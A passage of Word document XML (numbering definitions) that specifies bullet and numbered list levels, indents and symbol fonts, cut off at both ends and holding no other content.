        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="090A25E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B586E0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47F014EC"/>
    <w:lvl w:ilvl="0" w:tplc="237476AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F2EA84E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B330AB6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D97637E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6276DEBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="57246D18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CD28FF1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6CAEACEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B3D4589C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10"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E3628"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="811EEA62"/>
    <w:lvl w:ilvl="0" w:tplc="4280B8EA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Wingdings" w:cstheme="minorBid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39E63F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D181EDE"/>
    <w:lvl w:ilvl="0" w:tplc="A48AE296">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5B20419E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A4E8029E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C2B2B658">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F7D4192E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="47BA3382">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8354C90E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A2E2592A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="36B4F170">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="371C7E19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86304410"/>
    <w:lvl w:ilvl="0" w:tplc="6340F77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F667C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AEE0F2C"/>
    <w:lvl w:ilvl="0" w:tplc="FEA0027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1372B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85D81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BF851"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAB88794"/>
    <w:lvl w:ilvl="0" w:tplc="D42E7A48">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="934E8C72">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8BE40C3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0524B76E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="85EC1AB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="56544936">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="16481E5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3A8A0FFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="766EDDB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50EEC949"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="622EDCD0"/>
    <w:lvl w:ilvl="0" w:tplc="AE14E1BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="EDEC05FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="94A87378">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5888B3AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BAE8F472">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="828E1B3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CC7AF6D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="147C61A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="33AC9BD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5193B73B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA8E1410"/>
    <w:lvl w:ilvl="0" w:tplc="F03CF646">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="81FAE6BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C540AB16">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DC262518">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9530F3E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F46A2560">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1E18E008">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4BA42128">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7A1C157E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51CD37B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5514491A"/>
    <w:lvl w:ilvl="0" w:tplc="E39EB012">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1390F184">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E8303D8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ACB0654C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6B5AD0D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3D5EA79E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F4EC9346">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7AFC7380">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="57F4A9B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="52415448"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3C8CB22"/>
    <w:lvl w:ilvl="0" w:tplc="6E844D5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2F3A22D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="010C6CD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D9F4FD4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="02A6EBC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E1FC1CB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1DB4E404">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1F8A4822">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A2BEE532">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A1F94AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAD2D9BE"/>
    <w:lvl w:ilvl="0" w:tplc="FE84AF90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AA481F44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DFB4964E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9C1E9460">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9976D87A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="495A9838">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1F74E676">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DA80E3A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="692AEBB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E9BC2B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1074AD6A"/>
    <w:lvl w:ilvl="0" w:tplc="2F5E7CDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="965E0E64">
